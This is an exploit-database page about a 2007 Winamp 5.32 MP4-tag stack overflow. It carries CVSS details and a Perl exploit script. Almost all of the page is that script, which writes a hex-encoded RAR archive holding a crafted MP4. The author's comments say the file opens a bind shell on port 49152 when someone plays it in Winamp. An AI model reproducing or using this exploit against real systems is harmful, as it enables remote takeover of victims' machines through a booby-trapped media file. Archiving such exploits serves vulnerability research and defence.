Nullsoft Winamp MP4 tags Stack Overflow

2007.12.17
Credit: SYS 49152
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/bin/perl # # Nullsoft Winamp MP4 tags Stack Overflow # # 0-day discovered and exploited by SYS 49152 # # Tested on win XP SP2 ENG # Tuned for Nullsoft Winamp 5.32 d.i. # Shell on port 49152 # # usage: # well, not much fun for you kids here .. # to get the shell you have to use ALT+3 and press UPDATE. # Instead this one is VERY interesting for the exploiters around.. # this is an unicode sploit where in addition about half # of the 0x0-0xff range can't be used.. # I'm quite curious to see if someone understands how I did.. # if this is the case drop me a mail with the magic word # to gforce(put the @ here)operamail(put the . here)com # # btw # due to some complaints by some kids that were having serious # problems in using winzip, this time I tried with winrar :-) # # #update: #the latest 5.5 seems patched. #the winamp version 5.32 reflects the date when I last updated #this code, 'cause I exploited this one more than an year ago. #I see that marsu exploited the same bug about six months ago, #when I did the big mistake to show this one to some "friends".. #I'm sure that marsu can even give the details on how this bug works :-) # begin binary data: my $rar_data = # code 724983 "\x52\x61\x72\x21\x1A\x07\x00\xCF\x90\x73\x00\x00\x0D\x00\x00". "\x00\x00\x00\x00\x00\xBF\x95\x74\x20\x80\x3C\x00\x5A\x04\x00". "\x00\x70\x09\x00\x00\x02\x0B\x7C\xFB\x08\xB3\xB0\x24\x36\x1D". "\x33\x1C\x00\x20\x00\x00\x00\x53\x59\x53\x5F\x34\x39\x31\x35". "\x32\x5F\x4D\x50\x34\x5F\x66\x6F\x72\x5F\x77\x69\x6E\x61\x6D". "\x70\x2E\x6D\x70\x34\x0C\x1D\x51\x10\x8D\x0F\xCD\x81\x1C\x8A". "\x25\xAE\x74\x6C\x6C\x18\xC6\xDE\x86\xF5\x9C\x64\xDD\x9B\xB3". "\x66\xF3\x93\x84\xE7\x14\xE1\xBB\x3E\x0A\x4E\x31\x1A\xDE\xC8". "\xC4\xD9\xAD\xA7\xA4\x73\xA8\x33\xE0\xD8\x33\xE4\xF1\x98\xF4". "\x6D\x90\x0C\x03\x03\x00\xD0\x7B\x06\x31\x8F\xE2\x44\xB5\x4E". "\x93\x94\xE1\x22\x51\x45\x03\x0C\xCC\x30\x18\x66\x7F\x0B\x16". "\xE0\x0D\x83\xC1\xD8\x3E\x3B\xBB\x12\x93\xF8\x0D\xAC\xC5\x79". "\x77\xEA\xAA\xF5\x7C\x78\x5E\x7F\x35\x74\xBD\x75\x5E\x55\xF1". "\xF5\x2F\xDE\xF5\xDD\x5D\xDD\x25\x4A\xF8\xD2\xBE\x16\x92\x04". "\x17\xDF\xB2\xAC\xDC\xDD\x0E\x6D\x06\x62\xAD\x0C\xAC\x93\x92". "\x0F\xCE\xAF\xCB\xA1\xCB\xFD\x19\x08\x10\x7B\x25\xA0\xBA\x9E". "\xC5\xEF\x6B\xF1\xE9\x70\xFF\x7C\xFE\x14\x16\x3B\x81\xB6\xFB". "\xEC\xFB\xF2\x55\xA8\x07\xDF\xA5\x57\x80\xE7\x63\x1D\x63\xFD". "\xCC\xCF\xB3\xA5\x59\x2A\x73\xD4\x67\x67\x66\x7A\x0E\x6F\xBD". "\xB5\x39\x9E\x25\x60\xD8\x90\x6F\x0A\x85\x56\x55\xFE\x4A\x85". "\x6A\x3D\x08\xAB\x6F\xF8\x67\xAB\x3A\xBF\x8B\xBB\xF3\x79\xD4". "\x66\x77\xCE\xA3\xA9\xDB\x1B\x21\x50\x08\xF5\x3D\xCA\xF2\xEF". "\x7D\x5D\xE4\xFD\x9E\xE7\x5F\xB5\xD8\x4F\xDD\xF9\xFE\x4F\x8F". "\xEB\x4F\xD6\x4F\x56\x08\xC6\x0A\xBA\xB0\xBB\x75\xA1\xC8\x1D". "\xCE\xE1\x32\x77\x29\x36\x5B\xFC\x04\x58\xCD\x8B\x68\xCC\xD9". "\x51\x8D\x08\x41\xC2\xDF\x21\xE3\xFE\x47\xB2\x0D\x75\x2C\x7E". "\x09\xA5\x78\xD6\x95\x10\x42\x38\x56\xD5\xD6\xDF\x9F\x3B\x74". "\x8E\x2E\x32\xD8\x42\x25\xDB\x22\x75\x96\xDB\x41\x48\x6A\xFE". "\x94\x56\xB3\xE3\xAD\xA5\x3A\x25\x36\xAC\xEA\xC5\x8B\x4A\x6B". "\x32\xF9\xD9\xFD\x2C\x2F\x6F\x48\xD9\xAF\xE8\x44\xE2\x1D\x9C". "\x8A\x9E\x49\x57\x99\x08\x57\x95\xF9\x0C\xDA\x97\xA4\xB4\x96". "\x4E\xCC\x63\xA8\x56\x9B\x03\xF6\x3D\xE1\xA2\x95\x20\x33\xC0". "\x60\x54\xD7\x33\xF7\x6D\xEB\x13\xFF\x64\xC6\x94\x45\xA6\x34". "\xD8\x23\x99\xA0\xB2\xE3\x41\x58\x16\xE9\x92\x30\xB4\xE0\x4D". "\x26\x1C\x71\xDD\xBE\xA2\x24\xDA\x30\xA4\x51\xB5\xA8\x0C\xEE". "\xB0\xD2\xCB\x75\x72\xC7\x70\xE8\x6F\x71\x56\xF2\xCB\xAA\xF1". "\xD9\xF2\xC9\xA8\xDB\x4A\x78\x9A\x3D\x10\x84\x68\x7A\x63\xEC". "\x87\xFA\x84\x63\x79\x46\xEB\xBC\xA1\x31\xC1\xE0\x3B\xA1\x2D". "\xD7\x32\xCB\xCE\xC0\x0F\x40\x2C\x9E\x33\x3B\x4D\xF1\x91\xD7". "\x0F\xB0\x11\xF6\xC8\x2E\x16\xE8\x1A\x47\x08\xE2\x46\xC7\x23". "\x00\x8A\x65\xB0\x63\x61\x39\x68\x36\x47\x24\xC2\xDA\xE9\x07". "\xFB\x80\x43\x46\x97\x40\x1B\x6A\xE0\x3A\xBC\xEE\x7B\x5A\x60". "\x66\x4C\x10\xB7\xF3\x89\x99\x28\x13\x38\x01\x1E\x00\x65\x70". "\x3E\x01\xA2\x9E\x8D\x52\x43\x72\x63\x5A\x0F\x1E\x96\xD5\x89". "\xEC\x3F\x2D\xBB\x6E\x8B\x60\x9B\x09\x9F\x26\x8F\x41\x8F\x74". "\xE7\xCA\xDE\xA6\x28\xB4\x75\x75\x2A\x31\xFC\x8C\x0F\xC9\x4A". "\x00\x86\xCC\xDE\xB9\xBE\xD5\xC5\xE5\x02\x8E\xA1\x09\xE1\x32". "\x7C\x74\x38\xB5\xE7\xC9\x7C\x0D\x6D\x37\xB4\xF8\x26\xD4\x7A". "\x21\x16\x85\xC3\x97\xDE\x85\xBE\xA5\x0E\x68\x28\xAA\x02\xB5". "\x04\xF6\x3C\x6D\x10\x3B\xDC\x6F\x58\x13\x41\x6B\x86\x05\xDC". "\xB4\xDD\x1A\xEB\x68\x8E\x00\xE7\xC5\x66\x87\x1D\x37\x57\x09". "\x0A\x1C\x6C\x4C\x14\x98\xF8\x69\x79\x84\xB8\xB7\x7C\x46\x93". "\x0D\x0D\xB7\xC5\xC1\xC0\x46\x99\x36\x1A\x2C\x2C\x2E\x67\x1D". "\x1A\x2C\x54\x56\x92\x14\x58\x16\x5A\x34\xB7\xF8\x1D\xFF\x5F". "\x90\xEF\x25\xEB\xCD\x5C\xC0\x05\xF1\x7E\x8D\x22\x5C\x7C\x7C". "\x4B\xF4\x58\xDD\x54\x58\x37\x70\x04\x69\x53\x58\x58\x38\x77". "\x55\xA4\x06\x0E\x4D\x8C\x93\x07\x1B\x09\x1F\x4E\x1E\x43\xD2". "\xEC\x9A\xDC\xA5\xBF\xC2\x44\x9A\xBE\x6E\x86\x9F\xED\xF5\xF9". "\x0E\xB1\xEE\xF5\xFB\x1E\xF7\x67\xB5\xEF\xF6\xFE\x0E\xE7\xFE". "\x6D\xC8\xAF\x2C\xA3\xAF\x7F\x31\xA9\xE8\xB8\x49\xE6\x7C\x54". "\x91\x8D\x9D\x32\x9A\xE9\xD6\x66\xA7\xD2\x87\x8C\x8E\xC7\x39". "\x4E\x5E\x55\x8F\xCA\xB7\x43\x05\x3F\x17\xCC\xB0\x96\xA2\x98". "\xC5\x91\x42\x3A\xA1\x16\x0D\x57\x9B\x66\xF1\x6B\x95\x18\x32". "\x57\xB8\xB4\x1D\x15\x01\xC5\x4D\xD8\x26\x41\x90\x01\x09\x6E". "\x1F\x48\x24\x43\x84\x40\xAC\x4E\x6B\xB9\xCC\xE7\x5A\xC2\xA6". "\xDD\xC1\x8F\x22\x55\x77\x34\x97\x93\x6B\x6C\xCE\xAE\xF6\x5C". "\x14\xE6\x28\x0D\x15\x2E\x01\x81\xB2\x25\x6C\x51\xE1\x3B\x2E". "\x1B\x43\xD9\x86\x5C\x25\xF4\x74\x84\x35\xBA\xC3\x77\xEC\x92". "\xF4\x48\xD4\xE3\xA6\xD2\x38\x3A\xB3\x52\x3E\xF5\x49\x11\xA9". "\x32\x89\xC8\xDF\x8C\xDE\x10\xC8\x73\x2C\x05\x47\xA1\xB2\x4B". "\x0D\x5E\x59\xCF\xE9\x14\x1A\x57\x1D\x02\x7F\xD4\x97\x13\xF7". "\x77\x70\xD6\xD7\xA1\x31\x68\xBD\x9C\x00\xC9\xFC\x75\x0B\x6F". "\xC2\x50\x4B\xEF\x09\xAA\x09\x9C\xB8\xDB\x64\xF0\xAF\x38\x08". "\xD9\xC1\xD3\x5D\x6B\x30\x16\xB4\x68\xC5\xC7\xD2\x2E\x4C\xAB". "\x75\xCE\xC5\x81\x0E\xBB\x7E\x83\x2D\xC3\x35\x16\x10\xD1\x79". "\x63\x2E\x1D\xC2\xE9\xEF\x9B\x96\x0A\x52\xF5\xA4\x35\x5C\x63". "\xD8\xC6\x1E\x55\xEE\xF8\x7D\xDE\x0F\x09\xD4\x20\x4E\xAF\x3F". "\x2E\xE8\xE9\x0E\x8F\x55\x13\xE4\xA9\xF1\x65\xFF\xC2\xF4\xAA". "\xD5\x67\x66\x9C\x90\x9D\x08\x8E\xDE\x26\x46\x72\x9B\xBF\x97". "\x18\x1E\xAA\x9F\x69\x50\x01\xFF\x10\xC4\x3D\x7B\x00\x40\x07". "\x00"; # size = 1201 bytes open(code, ">unrarme.rar") || die "Can't Write temporary File\n"; binmode (code); print code $rar_data; close (code); print "\nFile ready, have fun..\n";


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top